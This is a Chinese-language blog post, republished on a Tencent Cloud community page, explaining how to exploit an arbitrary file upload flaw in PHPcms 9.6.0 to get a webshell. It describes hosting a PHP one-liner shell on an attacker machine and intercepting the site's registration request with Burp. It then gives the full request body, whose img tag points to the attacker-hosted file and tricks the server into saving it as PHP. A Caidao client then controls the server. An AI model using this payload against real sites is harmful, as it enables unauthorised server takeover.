专栏首页FreeBufPHPcms9.6.0 最新版任意文件上传漏洞(直接getshell)

PHPcms9.6.0 最新版任意文件上传漏洞(直接getshell)

对于PHPcms9.6.0 最新版漏洞,具体利用步骤如下:

首先我们在本地搭建一个php环境,我这里是appserv(只要可以执行php文件就行)

在根目录下新建一个txt文本文件里面写上php一句话,如上图可以访问

接着我们找到phpcms网站注册模块,随便填一下信息

然后我们用burpsuite抓包

然后发送到repeater

我们在最下面的注册那儿使用img标签插入我们本地第一步搭建的一句话

poc如下:

siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as

&email=a1ea21f94@qq.com&info[content]=<img src=http://192.168.1.157/templets/1.txt?.php#.jpg>&dosubmit=1&protocol=

只需要修改img里面的链接为你本地写入的一句话即可,还有要注意的是在repeater里测试go时每一次都要修改username,password和email字段值(不能重复,汗)

我们可以看到repeater里MYSQL query成功插入,接着访问上图repeater里我标黄语句,执行一句话

连接菜刀,getshell

利用方式二:

利用火狐的插件,操作如下

exp如下:三少

本文分享自微信公众号 - FreeBuf(freebuf),作者:三少

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-04-13

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Linux XOR DDoS僵尸网络发起强有力的DDoS攻击

    Akamai的专家们发现Linux XOR DDoS僵尸网络,它是一个恶意的网络基础设施,可用于对几十个目标发起强有力的DDoS攻击。此外,它主要针对游戏领域和...

    FB客服
  • 商业级别Fortify白盒神器介绍与使用分析

    ? 什么是fortify它又能干些什么? 答:fottify全名叫:Fortify SCA,是HP的产品,是一个静态的、白盒的软件源代码安全测试工具。 它通过...

    FB客服
  • 应急响应团队建设:云上威胁响应周期模型

    笔者在最近的安全沙龙上,同僚们表现出对应急响应方法论的渴求。所以我想通过真实案例来讲一下应急响应周期建设,以起到抛砖引玉之效,给大佬们的工作带来参考价值。

    FB客服
  • RASP攻防 —— RASP安全应用与局限性浅析

    随着Web应用攻击手段变得复杂,基于请求特征的防护手段,已经不能满足企业安全防护需求。在2012年的时候,Gartner引入了“Runtime applicat...

    腾讯安全应急响应中心
  • Linux XOR DDoS僵尸网络发起强有力的DDoS攻击

    Akamai的专家们发现Linux XOR DDoS僵尸网络,它是一个恶意的网络基础设施,可用于对几十个目标发起强有力的DDoS攻击。此外,它主要针对游戏领域和...

    FB客服
  • 使用DB4o做一个.Net版的website(一)环境

    一个机缘巧合之下,知道了DB4o这个数据库引擎,下载查看之后,被其方便、高效、以及便捷的管理方式锁折服。

    Isaac Zhang
  • 如何设计一个可靠的消息系统

    全民K歌的消息包含两种:一种是用户作品相关的消息汇聚,用户所有作品的评论、送礼等,按照时间线纵向给用户聚合起来。一种是横向用户与用户之间的交流信息,提供类似QQ...

    QQ音乐技术团队
  • [变革]上海统计局与一号店、上海钢联战略合作

    大数据文摘
  • 微信小程序「学科排名」发布了

    前几天,教育部公布了《全国第四轮学科评估结果》,在手机上看起来不太方便,于是本人就“撸起袖子加油干”,写了一套脚本把数据收集了一下,做成了微信小程序,叫「学科排...

    疯狂的小程序
  • 使用Rancher在K8S上部署高性能PHP应用程序的教程

    PHP是网络上最流行的编程语言之一,许多被广泛使用的内容管理系统都使用它开发,如WordPress和Drupal,并为现代服务器端框架(如Laravel和Sym...

    砸漏

扫码关注云+社区

领取腾讯云代金券